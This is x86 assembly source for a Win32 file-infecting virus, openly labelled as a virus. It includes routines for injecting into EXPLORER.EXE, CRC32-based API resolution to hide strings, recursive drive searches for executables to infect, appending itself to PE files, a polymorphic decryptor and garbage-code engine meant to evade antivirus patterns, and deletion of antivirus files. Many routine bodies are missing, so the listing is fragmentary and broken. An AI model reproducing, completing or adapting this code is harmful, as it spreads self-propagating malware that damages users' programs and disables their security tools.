;The purpose of this code is to get access to virus memory from EXPLORER.EXE
;============================================================================
EVL_code equ $
;============================================================
;Let some space for the return address... then save all regs
;============================================================
push eax
pushad
;============================================================
;This is the original address of the API... Lets make the
;return address point to it
;============================================================
;============================================================
;Attempt to avoid reentrance problems
;============================================================
call MultiThreadSafe
db 00h ;Only changed over hook code, not over main virus body
MultiThreadSafe:pop esi
mov edi,esi
cld
lodsb
or al,al
jnz MayBeOnNextCall
dec al
stosb
;============================================================
;Try to open the virus file-mapping
;
;There is some kinda race condition here... If the infected
;program terminates before this point we wont be able to
;find the rest of the virus in memory...
;
;In that case the hook will stay present, and this code may
;be able to find the virus memory-mapping on next attemps
;============================================================
call eax
or eax,eax
jz MayBeOnNextCall
;============================================================
;The file-mapping is here... Get an image of it
;============================================================
xor edx,edx
push edx
push edx
push edx
push edi
push eax
call eax
or eax,eax
jz MayBeOnNextCall
;============================================================
;Great! We have access to virus allocated memory, but
;remember we are now inside EXPLORER.EXE !!!!
;
;Jump to virus complete image in order to complete
;initialization inside EXPLORER.EXE
;============================================================
;============================================================
;Restore regs and jump to original API code
;============================================================
MayBeOnNextCall:popad
ret
;============================================================================
;Read process memory routine
;
;On entry:
; eax -> Pointer to the base address from which to read
; ecx -> Specifies the requested number of bytes to read
; esi -> Pointer to a buffer that receives the contents from
; the address address
;
; [ebp+hProcess] contains the target process handle
;
;On exit:
; eax -> NULL if error
;
; ebx, ecx, esi, edi, ebp preserved
;============================================================================
pop ecx
or eax,eax
jz ExitREM
xor eax,eax
;============================================================================
;Write process memory routine
;
;On entry:
; eax -> Pointer to the base address in the specified process
; to which data will be written
; ecx -> Specifies the number of bytes to write
; esi -> Pointer to the buffer that contains data to be written
;
; [ebp+hProcess] contains the target process handle
;
;On exit:
; eax -> NULL if error
;
; ebx, ecx, esi, edi, ebp preserved
;============================================================================
WriteProcessMem:push edi
push ecx
pop ecx
or eax,eax
jz ExitWEM
xor eax,eax
ExitWEM: pop edi
cld
ret
;============================================================================
;Make crc lookup table
;
;Generate a table for a byte-wise 32-bit CRC calculation on the polynomial:
;x^32+x^26+x^23+x^22+x^16+x^12+x^11+x^10+x^8+x^7+x^5+x^4+x^2+x+1.
;
;Polynomials over GF(2) are represented in binary, one bit per coefficient,
;with the lowest powers in the most significant bit. Then adding polynomials
;is just exclusive-or, and multiplying a polynomial by x is a right shift by
;one. If we call the above polynomial p, and represent a byte as the
;polynomial q, also with the lowest power in the most significant bit (so the
;byte 0xb1 is the polynomial x^7+x^3+x+1), then the CRC is (q*x^32) mod p,
;where a mod b means the remainder after dividing a by b.
;
;This calculation is done using the shift-register method of multiplying and
;taking the remainder. The register is initialized to zero, and for each
;incoming bit, x^32 is added mod p to the register if the bit is a one (where
;x^32 mod p is p+x^32 = x^26+...+1), and the register is multiplied mod p by
;x (which is shifting right by one and adding x^32 mod p if the bit shifted
;out is a one). We start with the highest power (least significant bit) of
;q and repeat for all eight bits of q.
;
;The table is simply the CRC of all possible eight bit values. This is all
;the information needed to generate CRC's on data a byte at a time for all
;combinations of CRC register values and incoming bytes.
;
;Original C code by Mark Adler
;Translated to asm for Win32 by GriYo
;============================================================================
make_crc_tbl:
;============================================================================
;Make exclusive-or pattern from polynomial (0EDB88320h)
;
;The following commented code is an example of how to
;make the exclusive-or pattern from polynomial
;at runtime
;
; xor edx,edx
; mov ecx,0000000Eh
; lea ebx,dword ptr [ebp+tbl_terms]
;calc_poly: mov eax,ecx
; xlatb
; sub eax,0000001Fh
; neg eax
; bts edx,eax
; loop calc_poly
;
; edx contains now the exclusive-or pattern
;
; The polynomial is:
;
; X^32+X^26+X^23+X^22+X^16+X^12+X^11+X^10+X^8+X^7+X^5+X^4+X^2+X^1+X^0
;
;tbl_terms db 0,1,2,4,5,7,8,10,11,12,16,22,23,26
;
;============================================================================
cld
mov ecx,00000100h
lea edi,dword ptr [ebp+tbl_crc32]
crc_tbl_do: mov eax,000000FFh
sub eax,ecx
push ecx
mov ecx,00000008h
make_crc_value: shr eax,01h
jnc next_value
xor eax,0EDB88320h
next_value: loop make_crc_value
pop ecx
stosd
loop crc_tbl_do
ret
;============================================================================
;Return a 32bit CRC of the contents of the buffer
;
;On entry:
; esi -> Ptr to buffer
; ecx -> Buffer size
;On exit:
; edx -> 32bit CRC
;============================================================================
get_crc32: cld
push edi
xor edx,edx
lea edi,dword ptr [ebp+tbl_crc32]
crc_calc: push ecx
lodsb
xor eax,edx
and eax,000000FFh
shr edx,08h
xor edx,dword ptr [edi+eax]
pop ecx
loop crc_calc
pop edi
ret
;============================================================================
;Get a 32bit CRC of a null terminated array
;
;On entry:
; esi -> Ptr to string
;Exit:
; edx -> 32bit CRC
;============================================================================
get_str_crc32: cld
push ecx
push edi
mov edi,esi
xor eax,eax
mov ecx,eax
crc_sz: inc ecx
scasb
jnz crc_sz
call get_crc32
pop edi
pop ecx
ret
;============================================================================
;Get the entry-point of GetProcAddress
;
;On entry:
; ebx -> KERNELL32 base address
;On exit:
; ecx -> Address of GetProcAddress
;============================================================================
GetGetProcAddr: cld
mov eax,dword ptr [ebx+IMAGE_DOS_HEADER.MZ_lfanew]
mov edx,dword ptr [eax+ \
ebx+ \
NT_OptionalHeader. \
OH_DirectoryEntries. \
DE_Export. \
DD_VirtualAddress]
add edx,ebx
mov esi,dword ptr [edx+ED_AddressOfNames]
add esi,ebx
mov edi,dword ptr [edx+ED_AddressOfNameOrdinals]
add edi,ebx
mov ecx,dword ptr [edx+ED_NumberOfNames]
function_loop: lodsd
push edx
push esi
lea esi,dword ptr [eax+ebx] ;Get ptr to API name
call get_str_crc32 ;Get CRC32 of API name
pop esi
cmp edx,dword ptr [ebp+CrcGetProcAddr]
je API_found
inc edi
inc edi
pop edx
loop function_loop
ret
;============================================================================
;Get the entry-point of each needed API
;
;This routine uses the CRC32 instead of API names
;
;On entry:
; ebx -> Base address of DLL
; ecx -> Number of APIs in the folling buffer
; esi -> Buffer filled with the CRC32 of each API name
; edi -> Recives found API addresses
;On exit:
; ecx -> Is 00000000h if everything was ok
;============================================================================
get_APIs: cld
get_each_API: push ecx
push esi
;============================================================
;Get a pointer to the EXPORT data
;============================================================
;============================================================
;Try to find an API name that matches given CRC32
;============================================================
API_Loop: lodsd
push esi ;Ptr to AddressOfNames
lea esi,dword ptr [eax+ebx]
push esi ;Save ptr to API name
call get_str_crc32
mov esi,dword ptr [esp+00000008h]
lodsd
cmp eax,edx
je CRC_API_found
pop eax ;Remove API name from stack
pop esi ;Ptr to RVA for next API name
loop API_Loop
get_API_error: pop esi ;Ptr to CRC's of API names
pop ecx ;Number of API's
ret ;Exit with error (ecx!=NULL)
;============================================================
;The ptr to API name is already on stack, now push the
;module handle and call GetProcAddress
;============================================================
or eax,eax
jz get_API_error;If GetProcAddress returned NULL exit
SEH_Block_0000 macro
add esp,-cPushad
jnz GNtBA_L1
endm
k32_f: popad
xchg ecx,eax
inc eax
GNtBA_L2: @SEH_RemoveFrame
ret
;============================================================================
;VirLoadLib
;
;To use CRC32 instead of API names sounds cool... But there are still some
;strings authors cant get rid of... When calling LoadLibrary the virus must
;specify the DLL name
;
;This routine is the solution to avoid the usage of DLL names
;
;On entry:
; eax -> CRC32 of DLL name
; esi -> CRC32 of API names
; edi -> Where to put API addresses
; ecx -> Number of APIs to find
;On exit:
; eax -> Module handle or NULL on error
;============================================================================
VirLoadLib: push ecx
push esi
push edi
push edi
call parse_filename
lea esi,dword ptr [ebp+DirectFindData+WFD_szFileName]
mov edi,edx
call parse_filename
mov ebx,eax
pop edi
pop esi
pop ecx
call get_APIs
jecxz OkVirLoadLib
push ebx
call dword ptr [ebp+a_FreeLibrary]
xor eax,eax
ret
;============================================================================
;This routine takes a string pointed by esi and copies
;it into a buffer pointed by edi
;
;The result string will be converted to upper-case
;
;On entry:
; esi -> Pointer to source string
; edi -> Pointer to returned string
;
;On exit:
; al -> Null
; edx -> Points to character next to last \
; edi -> Points 1byte above the null terminator
;============================================================================
;============================================================================
;Copyright notice and disclaimer
;============================================================================
;============================================================================
;Virus initialization ( inside EXPLORER.EXE )
;============================================================================
;============================================================
;Get current local time
;============================================================
;============================================================
;Initialize random number generator seed using current
;year and current month
;============================================================
cld
lodsw
rol eax,10h
lodsw
mov dword ptr [ebp+rnd32_seed],eax
;============================================================
;Locate KERNEL32 code section in memory... This information
;will be used later in the EPO routines
;============================================================
;============================================================
;Sleep for a moment, before start making noise
;============================================================
push 00005000h
call dword ptr [ebp+a_Sleep]
;============================================================
;Load IMAGEHLP.DLL
;
;The ImageHlp functions are supported by the Microsoft
;Windows NT, Windows 95, and Windows 98 operating systems...
;They are used mostly by programming tools, application setup
;utilities, and other programs that need access to the data
;contained in a PE image
;============================================================
;============================================================
;Load SFC.DLL (Windows 2000 only)
;============================================================
;============================================================
;Initialization inside EXPLORER.EXE complete...
;
;Now create a thread to search for files to infect and
;get control back to EXPLORER.EXE
;============================================================
;============================================================
;Free SFC
;============================================================
push eax
call dword ptr [ebp+a_FreeLibrary]
;============================================================
;Free IMAGEHLP
;============================================================
push eax
call dword ptr [ebp+a_FreeLibrary]
ret
;============================================================================
;Virus infection thread, created from inside EXPLORER.EXE process
;============================================================================
InfectionThread:call ThreadDelta
ThreadDelta: pop ebp
sub ebp,offset ThreadDelta
cmp eax,edi
ja ExitIThread
;============================================================
;Follow the drives chain
;============================================================
;============================================================
;Terminate infection thread
;============================================================
push 00000000h
call dword ptr [ebp+a_ExitThread] ;Leave the thread
;============================================================
;Check drive type, only fixed or remote drives allowed
;============================================================
;============================================================
;Got it! Do recursive search on drive
;============================================================
NextDrive: cld
NextDString: lodsb
or al,al
jnz NextDString
jmp DrivesLoop
;============================================================================
;Search for target...
;
;This routine its able to call itself in order to perform a recursive
;search all along the entire directory tree
;
;============================================================================
;============================================================
;Store local information on the stack
;============================================================
;Find frame:
;
; Path where to perform search ( size MAX_PATH )
; Return address ( size DWORD )
; FindHandle ( size DWORD )
; Find data ( size SIZEOF_WIN32_FIND_DATA )
;============================================================
;Do FindFirstFile
;============================================================
call parse_filename
dec edi
dec edi
;============================================================
;Find data ready to be checked
;============================================================
;============================================================
;Check for . and ..
;============================================================
cmp ax,002Eh
je DoFindNext
and eax,00FFFFFFh
cmp eax,00002E2Eh
je DoFindNext
;============================================================
;Check if this is a directory
;============================================================
test eax,FILE_ATTRIBUTE_DIRECTORY
jz DoFileFound
;============================================================
;Directory found, perform recursive search on it
;============================================================
push ebx
push edi
call parse_filename
call Search4Files
pop edi
add esp,MAX_PATH
pop ebx
jmp DoFindNext
;============================================================
;File found, check if its a valid host
;============================================================
jnz DoFindNext
;============================================================
;Save file time
;============================================================
cld
lea esi,dword ptr [ebx+WFD_ftCreationTime]
lea edi,dword ptr [ebp+FT_CreationTime]
;============================================================
;Check if file size is allowed
;============================================================
jae DoFindNext
cmp eax,inf_size
jbe DoFindNext
;============================================================
;Save the file size for l8r use
;============================================================
;============================================================
;Check if file is already infected, using size padding
;============================================================
mov ecx,SIZE_PADDING
xor edx,edx
div ecx
or edx,edx
jz DoFindNext
;============================================================
;Get complete path + filename and convert it to upper case
;============================================================
; al -> Null
; edx -> Points to filename at the end of path
; edi -> Points 1byte above the null terminator
;============================================================
;Check file extension
;============================================================
;============================================================
;Extension match... Infect file
;============================================================
call FileInfection
jmp short DoFindNext
;============================================================
;None of our infectable extensions match
;Lets see if this file is an AV related file...
;============================================================
mov esi,edx
call get_str_crc32
;============================================================
;AV file found... Reset its attributes and delete it
;============================================================
push esi
call dword ptr [ebp+a_DeleteFileA]
;============================================================
;Before looking for more files lets sleep a while
;============================================================
;============================================================
;Find next directory or file
;============================================================
or eax,eax
jnz GoFindRecord
mov esp,ebx
add esp,SIZEOF_WIN32_FIND_DATA + 00000004h
ret
;============================================================================
;Infect PE files
;
;On entry:
; BufStrFilename -> Buffer that contains complete path and
; filename
; DirectFindData -> Win32 Find Data structure filled with
; information about the file to infect
;============================================================================
;****************************************************************************
; mov eax,dword ptr [esi]
; cmp eax,'TAOG'
; jne ExitFileInf
;****************************************************************************
;============================================================
;Avoid some files from being infected
;============================================================
pop esi
jmp ExitFileInf
;============================================================
;Try to infect this file
;============================================================
;============================================================
;Exit file infection
;============================================================
;============================================================================
;Infect file routines
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;============================================================================
SEH_Block_0001 macro
add esp,-cPushad
jnz Ape_err
endm
;============================================================
;Open target file for read-only access
;============================================================
;============================================================
;Register ebx contains the base address of the target file
;all along infection routines
;============================================================
mov ebx,eax
;============================================================
;Check for MZ signature at base address
;============================================================
cld
cmp word ptr [ebx],IMAGE_DOS_SIGNATURE
jne inf_close_file
;============================================================
;Check file address of relocation table
;============================================================
;============================================================
;Now go to the pe header and check for the PE signature
;============================================================
add esi,ebx
lodsd
cmp eax,IMAGE_NT_SIGNATURE
jne inf_close_file
;============================================================
;Check machine field in IMAGE_FILE_HEADER
;just allow i386 PE files
;============================================================
;============================================================
;Now check the characteristics, look if file
;is an executable
;============================================================
jz inf_close_file
;============================================================
;Avoid DLL's
;============================================================
;============================================================
;Virus resides on last section
;============================================================
call get_last_sh
jecxz inf_close_file
;============================================================
;Check subsystem, only GUI applications allowed
;============================================================
;============================================================
;Save RVA of last section
;============================================================
mov eax,edi
sub eax,ebx
mov dword ptr [ebp+virus_sh],eax
;============================================================
;This is an attempt to avoid offending PE file formats
;============================================================
;============================================================
;Save a pointer to imports
;============================================================
;============================================================
;Go to relocations
;============================================================
;============================================================
;Relocations section is the last section?
;============================================================
;============================================================
;We cant overwrite relocations...
;...lets attach the virus to the end of last section
;============================================================
@SEH_SetupFrame <SEH_Block_0001>
xor ecx,ecx
pushad
call DoEPO
mov dword ptr [esp+Pushad_ecx],ecx
Ape_err: popad
@SEH_RemoveFrame
jecxz inf_close_file
mov dword ptr [ebp+inject_offs],ecx
;============================================================
;Close file...
;============================================================
call FileUnmapRO
;============================================================
;...and remap with oversize
;============================================================
call FileMapRW
or eax,eax
jz inf_file_err
;============================================================
;Move virus to file
;============================================================
push edi
mov ecx,inf_size
cld
rep movsb
;============================================================
;Save original code
;============================================================
pop edi
push edi
add edi,org_code-viro_sys
cld
movsb
movsd
;============================================================
;Save some registers on 1st decryptor
;============================================================
mov ecx,00000004h
push ecx
pop ecx
push ecx
pop ecx
pop edi
push edi
add edi,TblDoPolyPops-viro_sys
DoPolyPopsLoop: lodsd
lea edx,dword ptr [ebp+eax+TblDoPop]
mov al,byte ptr [edx]
stosb
loop DoPolyPopsLoop
;============================================================
;Prepare first decryptor mark
;============================================================
;============================================================
;Initialize size of all decryptors
;============================================================
;============================================================
;Get CRC32 of main virus body and save it for l8r use
;============================================================
pop esi
push esi
add esi,CRC_protected-viro_sys
mov ecx,SizeOfProtect
call get_crc32
pop edi
;============================================================
;Generate polymorphic encryption
;============================================================
add edi,inf_size
;============================================================
;Insert a call to virus code over the api call
;============================================================
;============================================================
;Calculate the CALL displacement
;============================================================
call get_code_sh
pop edx
sub eax,edx
pop edi
stosd
;============================================================
;Set read/write access on virus section
;============================================================
;============================================================
;Dont share virus section
;============================================================
;============================================================
;Update SizeOfRawData
;============================================================
;============================================================
;If we changed SizeOfRawData round up to nearest
;file alignment
;============================================================
xor edx,edx
mov ecx,dword ptr [ebp+raw_align]
div ecx
inc eax
mul ecx
mov edx,dword ptr [edi+SH_SizeOfRawData]
mov dword ptr [edi+SH_SizeOfRawData],eax
sub eax,edx
;============================================================
;Update VirtualSize
;============================================================
;============================================================
;Update SizeOfImage
;============================================================
;============================================================
;Find any data directory entry pointing to last section
;============================================================
mov ecx,IMAGE_NUMBEROF_DIRECTORY_ENTRIES
lea edx,dword ptr [esi+OH_DataDirectory]
FDataPtr2Last: mov eax,dword ptr [edx]
cmp eax,dword ptr [edi+SH_VirtualAddress]
jne NextFDataPtr
;============================================================
;Clear BASE RELOCATION field
;============================================================
;============================================================
;Compute new file checksum and update it on PE header
;============================================================
mov edx,eax
lea esi,dword ptr [ebp+ChecksumPE]
push esi ; CheckSum
lodsd
push esi ; HeaderSum
push edx ; FileLength
push ebx
;============================================================
;Mark file as infected and optimize file size
;============================================================
;============================================================
;Close file mapping
;============================================================
;============================================================================
;Scan host code
;
;On entry:
; ebx -> Memory image base address
;Exit:
; ecx -> Inject point offset in file
; or NULL if error
;============================================================================
call get_code_sh
jecxz ExitApe
lodsb
cmp al,0E8h ;Api call generated by Borland Linker?
je try_borland
call get_rnd_range
test eax,01h
jz err_api_call
pop eax
mov ecx,esi
dec ecx
sub ecx,ebx
ret
jmp found_place
;============================================================================
;SEH handling routines coded by Jacky Qwerty / 29A
;============================================================================
SEH_RemoveFrame:push 00000000h
pop edx
pop dword ptr [esp.(02h*Pshd).RetAddr]
pop dword ptr fs:[edx]
pop edx
ret (Pshd)
SEH_SetupFrame: call SEH_Frame
mov eax,[esp.EH_ExceptionRecord]
test byte ptr [eax.ER_ExceptionFlags], \
EH_UNWINDING or EH_EXIT_UNWIND
mov eax,dword ptr [eax.ER_ExceptionCode]
jnz SEH_Search
add eax,-EXCEPTION_ACCESS_VIOLATION
jnz SEH_Search
mov esp,dword ptr [esp.EH_EstablisherFrame]
mov dword ptr fs:[eax],esp
jmp dword ptr [esp.(02h*Pshd).Arg1]
SEH_Search: xor eax,eax
ret
;============================================================================
;FileMapRO open and map a file for read-only access
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;Exit:
; eax -> Base address of memory map for file or null if error
;============================================================================
;============================================================
;GetFileAttributes
;============================================================
;============================================================
;CreateFile ( GENERIC_READ )
;============================================================
cmp eax,INVALID_HANDLE_VALUE
je FileGetAttrErr
;============================================================
;CreateFileMapping ( PAGE_READONLY )
;============================================================
jmp FileGetAttrErr
;============================================================
;MapViewOfFile
;============================================================
jmp ErrFileMapRO
;============================================================
;Ready!
;============================================================
;============================================================
;UnmapRO
;============================================================
;============================================================================
;FileMapRW open and map a file for read and write access
;
;On entry:
; BufStrFilename -> Buffer filled with path + filename
;Exit:
; eax -> Base address of memory map for file or null if error
;============================================================================
;============================================================
;Calculate size of infected file
;============================================================
mov ecx,SIZE_PADDING
xor edx,edx
div ecx
inc eax
mul ecx
mov dword ptr [ebp+FatSize],eax
;============================================================
;SetFileAttributes
;============================================================
;============================================================
;CreateFile ( GENERIC_READ or GENERIC_WRITE )
;============================================================
jmp FileSetAttrErr
;============================================================
;CreateFileMapping ( PAGE_READWRITE )
;============================================================
jmp FileOpenErrorRW
;============================================================
;MapViewOfFile
;============================================================
;============================================================
;UnmapRW
;============================================================
;============================================================================
;Convert RVA to RAW
;
;On entry:
; ebx -> Host base address
; edx -> RVA to convert
;On exit:
; ecx -> Pointer to RAW data or NULL if error
; edx -> Section delta offset
; esi -> Pointer to IMAGE_OPTIONAL_HEADER
; edi -> Pointer to section header
;============================================================================
RVA2RAW: cld
mov dword ptr [ebp+search_raw],edx
mov esi,dword ptr [ebx+MZ_lfanew]
add esi,ebx
lodsd
movzx ecx,word ptr [esi+FH_NumberOfSections]
jecxz err_RVA2RAW
movzx edi,word ptr [esi+FH_SizeOfOptionalHeader]
add esi,IMAGE_SIZEOF_FILE_HEADER
add edi,esi
;============================================================
;Get the IMAGE_SECTION_HEADER that contains RVA
;
;At this point:
;
;ebx -> File base address
;esi -> Pointer to IMAGE_OPTIONAL_HEADER
;edi -> Pointer to first section header
;ecx -> Number of sections
;
;Check if address of imports directory is inside this
;section
;============================================================
;============================================================
;Go to next section header
;============================================================
;============================================================================
;Get code section header and entry-point information
;
;On entry:
; ebx -> Host base address
;On exit:
; ecx -> Pointer to RAW data or NULL if error
; edx -> Entry-point RVA
; esi -> Pointer to IMAGE_OPTIONAL_HEADER
; edi -> Pointer to section header
;============================================================================
;============================================================================
;Get pointer to last section header
;
;On entry:
; ebx -> Host base address
;On exit:
; esi -> IMAGE_OPTIONAL_HEADER
; edi -> Pointer to last section header
;============================================================================
;============================================================================
;Generate data area suitable for memory write access
;
; edi -> Base address
; ecx -> Size
;============================================================================
gen_data_area: push eax
push edx
mov eax,edi
sub eax,dword ptr [ebp+map_is_here]
add eax,dword ptr [ebp+host_base]
push ecx
pop ecx
mov dword ptr [edx+00000004h],ecx
;============================================================================
;Generate a block of random data
;============================================================================
;============================================================================
;Linear congruent pseudorandom number generator
;============================================================================
;============================================================================
;Perform encryption
;============================================================================
;============================================================
;This buffer will contain the code to "crypt" the virus code
;followed by a RET instruction
;============================================================
;============================================================================
;Generate decryptor action: Load pointer
;
;We dont need to get delta-offset, this virus assumes fixed load address
;============================================================================
;============================================================================
;Generate decryptor action: Load counter
;============================================================================
;============================================================
;Easy now, just move counter random initial value
;into counter reg and calculate the end value
;============================================================
;============================================================================
;Generate decryptor action: Decrypt
;============================================================================
call fake_or_not
xor eax,eax
mov al,byte ptr [ebp+oper_size]
shr eax,01h
shl eax,02h
add esi,eax
lodsd
add eax,ebp
mov esi,eax
push edi
lea edi,dword ptr [ebp+perform_crypt]
loop_string: lodsb
cmp al,MAGIC_ENDSTR
je end_of_magic
cmp al,MAGIC_ENDKEY
je last_spell
xor ecx,ecx
mov cl,al
rep movsb
jmp short loop_string
last_spell: call copy_key
end_of_magic: mov al,0C3h
stosb
pop edi
ret
;============================================================================
;Copy encryption key into work buffer taking care about operand size
;============================================================================
;============================================================================
;Generate decryptor action: Move index to next step
;============================================================================
;============================================================
;Get number of bytes to inc or dec the index reg
;============================================================
;============================================================
;Get number of bytes to update with this instruction
;============================================================
;============================================================
;Check direction
;============================================================
call do_step_up
jmp short next_update
;============================================================
;Move index_reg up
;============================================================
mov eax,NumIdxUp
call get_rnd_range
lea esi,dword ptr [ebp+tbl_idx_up+eax*04h]
lodsd
add eax,ebp
jmp eax
;============================================================
;Move index_reg down
;============================================================
mov eax,NumIdxDown
call get_rnd_range
lea esi,dword ptr [ebp+tbl_idx_down+eax*04h]
lodsd
add eax,ebp
jmp eax
;============================================================================
;Generate decryptor action: Next counter value
;============================================================================
;============================================================
;Check counter direction and update counter
;using a INC or DEC instruction
;============================================================
mov al,40h
jmp DoShitWithCtr
mov al,48h
jmp DoShitWithCtr
call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov ah,byte ptr [ebx+REG_MASK]
shl ah,03h
or ah,byte ptr [ebp+counter_mask]
or ah,0C0h
mov al,8Bh
stosw
push ebx
call GenGarbageEx
pop ebx
pop eax
or al,byte ptr [ebx+REG_MASK]
stosb
push ebx
call GenGarbageEx
pop ebx
mov ah,byte ptr [ebp+counter_mask]
shl ah,03h
or ah,byte ptr [ebx+REG_MASK]
or ah,0C0h
mov al,8Bh
stosw
xor byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
ret
;============================================================================
;Generate decryptor action: Loop
;============================================================================
;============================================================
;Use counter reg in CMP instruction?
;============================================================
;============================================================
;Generate CMP counter_reg,end_value
;============================================================
mov ax,0F881h
or ah,byte ptr [ebp+counter_mask]
stosw
mov eax,dword ptr [ebp+end_value]
stosd
jmp doloopready
;============================================================
;Get a random valid register to use in a CMP instruction
;============================================================
;============================================================
;Move index reg value into aux reg
;============================================================
;============================================================
;Guess what!?
;============================================================
push ebx
call GenGarbageEx
pop ebx
call get_rnd32
and al,03h
or al,al
jz loop_use_cmp
test al,02h
jz loop_use_sub
;============================================================
;Generate ADD aux_reg,-end_value
;============================================================
loop_use_add: mov ax,0C081h
or ah,byte ptr [ebx+REG_MASK]
stosw
mov eax,dword ptr [ebp+end_value]
neg eax
stosd
jmp short done_loop_use
;============================================================
;Generate CMP aux_reg,end_value
;============================================================
;============================================================
;Generate SUB aux_reg,end_value
;============================================================
;============================================================
;Restore aux reg state
;============================================================
;============================================================
;Generate conditional jump
;============================================================
TblExitLoop equ $
dd offset doloopup
dd offset doloopdown
dd offset doloopmix
;============================================================
;Generate the following structure:
;
; loop_point:
; ...
; jnz loop_point
; ...
; jmp decrypted-code
;============================================================
;============================================================
;...or this one:
;
; loop_point:
; ...
; jz decrypted-code
; ...
; jmp loop_point
; ...
;============================================================
sub eax,edi
sub eax,00000004h
stosd
call GenGarbageEx
;============================================================
;Generate the following structure:
;
; loop_point:
; ...
; jnz auxdest
; ...
; jmp decrypted-code
; ...
; auxdest:
; ...
; jmp loop_point
;============================================================
;============================================================
;I notice some AV was using the JZ/JNZ instruction at the
;end of the decryptor in a search pattern... So now im going
;to build it at runtime (sometimes...)
;============================================================
mov eax,NumFog
call get_rnd_range
lea esi,dword ptr [ebp+TblDoFog+eax*04h]
lodsd
add eax,ebp
call eax
mov eax,NumFixFog
call get_rnd_range
lea esi,dword ptr [ebp+TblFixFog+eax*04h]
lodsd
mov esi,dword ptr [ebp+condition_ptr]
add eax,ebp
call eax
NoFogRet: ret
;============================================================================
;Prepare pointer to memory into fog block, using ADD
;============================================================================
;============================================================================
;Prepare pointer to memory into fog block, using SUB
;============================================================================
DoFogSub: call FogStart
neg eax
add eax,dword ptr [ebp+Xrnd1]
push edi
push eax
mov ebx,dword ptr [ebp+XrndReg]
mov edi,dword ptr [ebp+XrndFixPtr]
mov ax,0E881h
or ah,byte ptr [ebx+REG_MASK]
stosw
pop eax
stosd
pop edi
ret
;============================================================================
;Prepare pointer to memory into fog block, using XOR
;============================================================================
;============================================================================
;Setup fog block
;============================================================================
;============================================================================
;Convert a given value in the poly decryptor to its future RVA
;
;On entry:
; eax -> Value to convert
;On exit:
; eax -> Converted value
;============================================================================
;============================================================================
;Produce complex end determination
;
;On entry:
; esi -> PtrToEP or loop_point
;============================================================================
;============================================================
;Go using JMP imm
;============================================================
;============================================================
;Go using complex escheme
;============================================================
call get_valid_reg
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
call get_rnd32
stosd
push eax
push ebx
call GenGarbageEx
mov eax,NumJmpEnd
call get_rnd_range
lea esi,dword ptr [ebp+tbl_jmp_end+eax*04h]
lodsd
add eax,ebp
pop ebx
pop edx
pop esi
call eax
push ebx
call GenGarbageEx
pop ebx
call get_rnd32
and al,01h
jz EndUseJmpReg
;============================================================================
;Complex end using ADD
;============================================================================
;============================================================================
;Complex end using SUB
;============================================================================
;============================================================================
;Complex end using XOR
;============================================================================
;============================================================================
;Complex fixed address
;============================================================================
;============================================================================
;Generate init garbage
;============================================================================
mov ecx,eax
loop_g_i_g: push ecx
mov eax,(end_i_g-tbl_i_g)/04h
call get_rnd_range
pop ecx
loop loop_g_i_g
ExitInitGarbage:ret
;============================================================================
;Generate some garbage code
;============================================================================
call get_rnd_range
inc eax
inc eax
mov ecx,eax
loop_garbage: push ecx
mov eax,(end_garbage-tbl_garbage)/04h
mov eax,(save_space-tbl_garbage)/04h
ok_gen_num: call get_rnd_range
lea esi,dword ptr [ebp+tbl_garbage+eax*04h]
lodsd
add eax,ebp
call eax
too_much_shit: pop ecx
loop loop_garbage
;============================================================
;Update recursive level
;============================================================
;============================================================================
;Generate MOV reg,imm
;============================================================================
;============================================================
;Generate MOV reg32,imm
;============================================================
;============================================================
;Generate MOV reg16,imm
;============================================================
;============================================================
;Generate MOV reg8,imm
;============================================================
;============================================================================
;Generate xchg reg,reg
;============================================================================
;============================================================================
;Generate MOVZX/MOVSX reg32,reg16
;============================================================================
;============================================================================
;Generate INC reg
;============================================================================
;============================================================================
;Generate DEC reg
;============================================================================
;============================================================================
;Generate ADD/SUB/XOR/OR/AND reg,imm
;============================================================================
;============================================================================
;Generate decryption instructions (real or fake ones)
;============================================================================
;============================================================
;Check if we are going to use a displacement in the
;indexing mode
;============================================================
;============================================================
;Choose generator for [reg] indexing mode
;============================================================
;============================================================
;More fun?!?!
;============================================================
;============================================================
;Choose generator for [reg+imm] indexing mode
;============================================================
;============================================================
;Use magic to convert some values into
;desired instructions
;============================================================
test al,CRYPT_COMPLEX
jz ok_complex
;============================================================
;Get random displacement from current displacement
;eeehh?!?
;============================================================
mov eax,00001000h
call get_rnd_range
mov dword ptr [ebp+disp2disp],eax
call load_aux
push ebx
call GenGarbageEx
;============================================================
;Choose generator for [reg+reg+imm] indexing mode
;============================================================
push ebx
call GenGarbageEx
;============================================================
;Choose generator for [reg+reg] indexing mode
;============================================================
;============================================================
;Build decryptor instructions
;============================================================
pop ebx
;============================================================
;Restore aux reg state
;============================================================
;============================================================
;Get post-build flags
;============================================================
common_part: lodsb
;============================================================
;Insert displacement from real address?
;============================================================
test al,MAGIC_PUTDISP
jz skip_disp
push eax
mov eax,dword ptr [ebp+fake_ptr_disp]
sub eax,dword ptr [ebp+disp2disp]
neg eax
stosd
pop eax
;============================================================
;Insert key?
;============================================================
skip_key: ret
;============================================================================
;Choose a magic generator
;============================================================================
;============================================================================
;Do operand size correction
;============================================================================
size_correct: lodsb
mov ah,byte ptr [ebp+fake_oper_size]
cmp ah,01h
je store_correct
inc al
cmp ah,04h
je store_correct
mov ah,66h
xchg ah,al
stosw
ret
store_correct: stosb
ret
;============================================================================
;Load aux reg with displacement
;============================================================================
;============================================================
;Get a valid auxiliary register
;============================================================
;============================================================
;Move displacement into aux reg
;============================================================
mov al,0B8h
or al,byte ptr [ebx+REG_MASK]
stosb
pop eax
neg eax
stosd
ret
;============================================================================
;Generate push reg + garbage + pop reg
;============================================================================
call get_rnd32
test al,01h
jnz skip_sp_push
call push_with_sp
jmp short from_push
call gen_garbage
ret
;============================================================================
;Emulate a PUSH instruction, using SUB ESP,00000004h
;============================================================================
;============================================================================
;Emulate a POP instruction, using ADD ESP,00000004h
;============================================================================
;============================================================================
;Generate RET in different ways
;============================================================================
call get_valid_reg
mov al,58h
or al,byte ptr [ebx+REG_MASK]
stosb
or byte ptr [ebx+REG_FLAGS],REG_READ_ONLY
push ebx
call GenGarbageEx
pop ebx
